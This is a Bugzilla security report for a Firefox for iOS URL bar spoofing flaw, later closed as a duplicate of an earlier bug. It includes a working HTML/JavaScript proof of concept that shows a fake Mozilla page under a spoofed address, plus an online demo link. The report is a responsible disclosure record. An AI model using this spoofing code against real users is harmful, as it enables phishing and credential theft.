Closed Bug 1264295 Opened 9 years ago Closed 9 years ago

Firefox For iOS URL Bar Spoofing Vulnerability [Caused by window.open('','aa'); ]

Categories

(Firefox for iOS :: Browser, defect)

Product:
Firefox for iOS
Component:
Browser
Platform:
Other
iOS
Type:
defect

Tracking

()

Status:
RESOLVED DUPLICATE of bug 1263974
Tracking Flags:
Tracking Status
fxios 4.0+ ---
fxios-v3.0 --- affected

People

(Reporter: 1009465756, Unassigned)

References

Details

(Keywords: csectype-spoof, reporter-external, sec-high)

Attachments

(1 file)

POC-PIC.PNG
53.98 KB, image/png
Details
Attached image POC-PIC.PNG
User Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 Steps to reproduce: I found another way to carry out URL Bar Spoofing in Firefox For iOS. It is different from https://bugzilla.mozilla.org/show_bug.cgi?id=1263974, because it is caused by the JavaScript code: window.open('','aa'); Firefox for iOS doesn't change the URL bar into about:blank when the JavaScript code above execute. Beside, both of Firefox Android version and Safari don't have the issue. I think that this issue is more serious than BUG-1263974. Here is the POC source code: <!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> </head> <body> <form action="http://www.mozilla.org:800" target="aa" method="post" onsubmit="setTimeout('p()',1000);"> <input type="submit"> </form> <script> function p() { var t = window.open('','aa'); t.document.body.innerHTML = '<h1>Fake Mozila Homepage!</h1>'; t.stop(); } </script> </body> </html> Here is the online POC: http://1.srcms.applinzi.com/mozilarepro20160413.html Click the "submit query" to reproduce the problem. Actual results: Attackers would have the ability to control the URL shown by the browser, for example, be used to easily convince users that they are on a bank’s website when they are actually on a phishing page designed to steal their financial information. Expected results: 1. Never change the URL bar until the full website is loaded. 2. When window.open('','aa'); is executed, create another tab or change the URL bar into about:blank.
Severity: normal → major
Rank: 1
status-fxios-v3.0: --- → affected
tracking-fxios: --- → 4.0+
Flags: sec-bounty?
This is conceptually similar to bug 1263974 -- find some way to prevent the new page from loading. The fix for the other bug may fix this. Then again, it might be different enough to be a separate bug.
See Also: → 1263974
Status: UNCONFIRMED → NEW
Ever confirmed: true
Keywords: csectype-spoof, sec-high
Looking into this, both this bug and bug 1263974 are pretty much identical. Both start a request to a URL with a bad port, and the issue is that we show this URL before the page starts to load. I think this can be duped to bug 1263974.
Confirmed that bug 1263974 fixes this test case.
Status: NEW → RESOLVED
Closed: 9 years ago
Resolution: --- → DUPLICATE
Flags: sec-bounty? → sec-bounty-
Group: firefox-core-security
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: